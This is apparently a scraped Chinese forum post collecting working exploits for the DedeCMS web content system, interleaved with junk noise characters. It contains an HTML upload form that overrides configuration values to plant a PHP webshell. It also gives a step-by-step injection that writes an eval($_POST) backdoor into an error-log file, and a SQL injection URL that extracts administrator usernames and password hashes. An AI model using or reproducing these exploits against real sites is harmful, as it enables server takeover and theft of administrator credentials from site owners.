<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
1 {; }) n: [, i% t4 i% _! V</head>
0 m- @6 s1 j" ^3 [8 M k; `" p<body style="FONT-SIZE: 9pt">
, d8 s4 d: `% L! Q---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />$ h" |, X' [3 n! x" G N; C/ `2 P
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>: j1 K! @' \/ t5 F3 I' o' z0 s
<input type='hidden' name='activepath' value='/data/cache/' />
; z! ~9 `* e. h" Q7 v* r<input type='hidden' name='cfg_basedir' value='../../' /># Z8 h s) T3 `5 S
<input type='hidden' name='cfg_imgtype' value='php' />
& m# C1 D- K7 J& y<input type='hidden' name='cfg_not_allowall' value='txt' />. q/ I- Q o+ p5 K6 q
<input type='hidden' name='cfg_softtype' value='php' />
, n% i, r5 I; h' i5 _/ {<input type='hidden' name='cfg_mediatype' value='php' />. a: @0 a+ J7 \* `7 p1 y* x
<input type='hidden' name='f' value='form1.enclosure' />! Y' d( P4 \$ D+ Z4 j: ]
<input type='hidden' name='job' value='upload' />
( `! w, w7 F6 B5 a [& I/ T<input type='hidden' name='newname' value='fly.php' />
- \3 Z3 h. {2 L4 W4 z, sSelect U Shell <input type='file' name='uploadfile' size='25' />2 x. T H5 p3 r/ I
<input type='submit' name='sb1' value='确定' /> r2 x/ l" J$ w d2 N0 @
</form>3 ~/ W- Y& c: d4 m$ |( l2 {8 Q
<br />It's just a exp for the bug of Dedecms V55...<br />* K; X! S0 d6 A2 w+ j1 \' [6 `3 s
Need register_globals = on...<br />! c# i+ F. \1 i
Fun the game,get a webshell at /data/cache/fly.php...<br />
, V5 _. n! v/ ^* B3 m</body>
0 z' o4 j- W: d' b* e* B1 E</html>
1 L2 e! A/ w4 {; y5 Z: o2 W5 }3 {( P7 h; T: ]3 a
7 m6 a! L' L( v; x5 k" X
7 N. x" J# h( o$ B4 ~) G5 S# ^! ]0 ^/ j7 Q' a
8 _0 h; f+ n5 M; G) Z9 K3 u
' I) U4 \- m! U% z; t
: @6 o0 N8 Z* W& L. y
. J6 ?- @, l& ?9 w
, J' G) [& V/ r
: O3 c( |+ O2 m- k7 P$ N织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞- @4 d: ~! D) q5 y" _* y2 g% r
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
/ I4 s2 j- U! B G4 N1 `! y& E1. 访问网址:
' y1 C+ O9 G: r/ Y S) H. b! Bhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ v" J# K+ x, }9 P
可看见错误信息
3 q: u- C# Q4 m, {: S5 g. M/ ]& R( }: l' d1 V; P# W/ M5 h
: ] k4 A1 h% W2 k
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。1 i7 Y) B" ~1 q( Q
int(3) Error: Illegal double '1024e1024' value found during parsing
" k% ?, T" f4 `2 k; E- x: vError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>6 f! U, d9 D# C7 V7 w, |9 W
1 G' d2 }# h, F9 d) Y6 j
1 b7 C ?# T+ _ S4 N: [. f3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是' J7 x! i* M8 P. U- ~
3 s' }5 x* \% ~- d z
# X+ ?/ ?1 B- `$ f
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>% d; m& n& Q( s
. l& Y3 f8 }1 c9 ^; a) ]
! r' f* _. E- {! D按确定后的看到第2步骤的信息表示文件木马上传成功.
$ z0 Z9 r: T0 A5 {$ ]. d0 a+ _' c0 @, r* U2 q8 K) R
$ R9 u9 h, d; ?* }* h0 r
; p! @' e9 \" [" {2 b- m8 E
) K' p. V/ Y t$ H3 [! L
4 `% V! A( r! ^$ J; {- Y! {
1 E" z* h0 S* q) R8 P- a6 ~8 h& r( ]. i1 h* D
5 J! S+ K& o4 t7 U% Z! z; L# S
' [3 m- P7 M3 F$ I# f& ~2 e& x* n0 K( h4 E8 N
1 w& s' {, i7 Q2 j9 K/ r
6 g+ z/ @0 q5 t0 G- m( U" K! O织梦(DedeCms)plus/infosearch.php 文件注入漏洞
* s! D q! w" t; t$ D; V0 Jhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对